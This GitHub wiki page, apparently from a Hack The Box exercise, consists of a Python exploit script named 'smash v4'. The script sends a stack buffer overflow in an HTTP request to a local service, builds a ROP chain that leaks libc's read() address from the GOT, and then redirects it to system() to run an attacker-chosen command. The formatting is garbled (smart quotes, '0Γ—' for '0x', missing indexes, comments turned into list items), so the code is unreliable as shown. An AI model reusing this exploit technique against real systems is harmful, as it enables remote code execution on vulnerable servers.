smash v4 - adydawkins/htb-rabbit GitHub Wiki

#!/usr/bin/python
import os, sys, socket
import struct
import requests

addr = (β€˜127.0.0.1’, 9999)

cmd = sys.argv1+"\0"
#cmd = β€˜ls’

libcread_offset = 0Γ—0e8050
libcsystem_offset = 0Γ—042510

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

payload = r’GET /\AAAA’

#filler – fill buffer with A’s , thought this would be 536 – 4, but turns out to be 535
payload += β€˜A’ * (535 – 4)

#overwrite RBX – offset 536
payload += β€˜B’ * 8

#overwrite RBP – offset 544
payload += β€˜C’ * 8

#fill before start of RSP – offset 568
payload += β€˜D’ * 16

#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)
someother = struct.pack(β€œ<Q”, 0Γ—000400cf0) #read() call loc
someother += struct.pack(β€œ<Q”, 0Γ—000401787) #PPPR
someother += struct.pack(β€œ<Q”, 4) #stdin
someother += struct.pack(β€œ<Q”, 0Γ—000602e28) #.dynamic addr
someother += struct.pack(β€œ<Q”, len(cmd)) #len of cmd

#leak address of read() in randomised libc
someother += struct.pack(β€œ<Q”, 0Γ—400c50) #write() call loc
someother += struct.pack(β€œ<Q”, 0Γ—000401787) #PPPR
someother += struct.pack(β€œ<Q”, 4) #stdout
someother += struct.pack(β€œ<Q”, 0Γ—000603088) #read() in GOT
someother += struct.pack(β€œ<Q”, 8) #len

#call read@plt to overwrite the ptr stored in GOT
someother += struct.pack(β€œ<Q”, 0Γ—000400cf0) #read() call loc
someother += struct.pack(β€œ<Q”, 0Γ—000401787) #PPPR
someother += struct.pack(β€œ<Q”, 4) #stdin
someother += struct.pack(β€œ<Q”, 0Γ—000603088) #read() in GOT
someother += struct.pack(β€œ<Q”, 8) #len

#call read@plt with address of system() in libc
someother += struct.pack(β€œ<Q”, 0Γ—000400cf0) #read() call loc
someother += β€˜FFFFFFFF’ # bogus
someother += struct.pack(β€œ<Q”, 0Γ—000602e28) #.dynamic addr system()

  1. libc read offset = 0Γ—0e8050
  2. libc system offset = 0Γ—042510

#padding – continue filler, writing into RSP
#payload += β€˜E’ * 150
payload = payload + someother

s.connect(addr)

#print(payload+’ ’+r’HTTP/1.1’+’\n’+’Host: localhost:9999’+’\n’+’User-Agent: curl/7.60.0’+’\n’+’Accept: /β€˜+’\n’)

s.send(payload+’ ’+r’HTTP/1.1’+’\n’+’Host: localhost:9999’+’\n’+’User-Agent: curl/7.60.0’+’\n’+’Accept: /β€˜+’\n’+’\n’+’\n’)

s.send(cmd)

  1. calculate system() addr and send back
    readaddr = struct.unpack(β€œ<Q”, s.recv(1024))0
    print β€œlibc read() found at 0x%.8x” % readaddr
    systemaddr = readaddr – libcread_offset + libcsytem_offset
    print β€œlibc system() found at 0x%.8x” % systemaddr
    s.send(struct.pack(β€œ<Q”, systemaddr))

print s.recv(1024)

s.close

⚠️ **GitHub.com Fallback** ⚠️